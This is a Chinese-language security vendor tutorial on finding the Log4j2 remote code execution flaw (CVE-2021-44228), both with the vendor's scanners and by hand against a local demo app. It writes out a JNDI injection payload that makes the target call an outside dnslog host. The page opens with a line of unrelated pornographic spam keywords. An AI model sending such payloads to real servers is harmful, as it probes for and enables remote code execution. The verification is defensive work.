国产精品无码一区二区三区,亚洲精品97久久中文字幕无码,极品尤物一区二区三区,精品香蕉一区二区三区

數字經濟的安全基石

產品技術

首頁 > 資源中心 > 知識中心 > 產品技術 > 正文

玩轉Log4j2遠程代碼執行漏洞,安恒明鑒保姆級教程


2021.12.10,一個平平無奇的脫發日,突然老板來了消息。


工具發現

明鑒漏洞掃描系統

安恒明鑒漏掃產品第一時間已具備對該漏洞的掃描與檢測能力,根據產品通知,將網站掃描策略升級至V1.3.582.534版本,開始做掃描任務。


1、新建策略模板,單獨選擇Apache Log4j 2遠程代碼執行掃描策略


2、新建掃描任務,選擇對應策略模板并提交任務。


3、由于只針對這一個漏洞做應急掃描,任務很快執行完成,查看掃描結果,成功發現漏洞!


明鑒Web應用弱點掃描器

將策略庫版本升級至V6.1.117版本,即可具備Apache Log4j 2遠程代碼執行(CVE-2021-44228)漏洞發現能力。


1、新建任務填寫掃描目標。


2、選擇自定義策略,勾選Apache Log4j遠程代碼執行(CVE-2021-44228)掃描策略。


3、待任務執行完成后,查看掃描結果。依舊發現,從工具中導出報告交給領導就能交差了!


順利完成任務,不過這個波及廣泛的Apache Log4j2 遠程代碼執行漏洞到底是啥,作為小白有必要一探究竟。


環境搭建

服務器環境

操作系統:centos7.7

JAVA環境:JDK1.8

Centos7.7安裝教程:

https://www.cnblogs.com/weihengblogs/p/13724167.html

JAVA環境部署教程:

https://www.cnblogs.com/stulzq/p/9286878.html


漏洞環境獲取

獲取地址:

https://pan.baidu.com/s/12ftEpSFnOjjITGlWNbl84w

提取碼:r5pk?


后臺啟用Log4j2漏洞環境


nohupjava-jarspringboot-log4j2-demo-0.0.1-SNAPSHOT.jar&


訪問環境

漏洞環境的Web服務監聽8082端口,param參數會調用log4j。這時請求一下該參數,確認環境是否正常。

http://X.X.X.X:8082/test?param=1


漏洞驗證

通過dnslog.cn獲取dnslog子域


構造payload


${jndi:ldap://fj537p.dnslog.cn/exp}


帶入payload請求驗證dns訪問


http://X.X.X.X:8082/test?param=${jndi:ldap://fj537p.dnslog.cn/exp}


查看dnslog回顯

看到這個回顯就證明漏洞存在了。如果沒有工具借助,按此方法來也能夠驗證。但若想快速便捷地大批量進行驗證,還是需要購買專業漏洞掃描類產品,畢竟下一個高危漏洞爆發咱也不知道好不好手工驗證。

與專家在線溝通, 免費獲取專業解決方案

線上咨詢
聯系我們

咨詢電話:400-6059-110

產品試用

即刻預約免費試用,我們將在24小時內聯系您

微信咨詢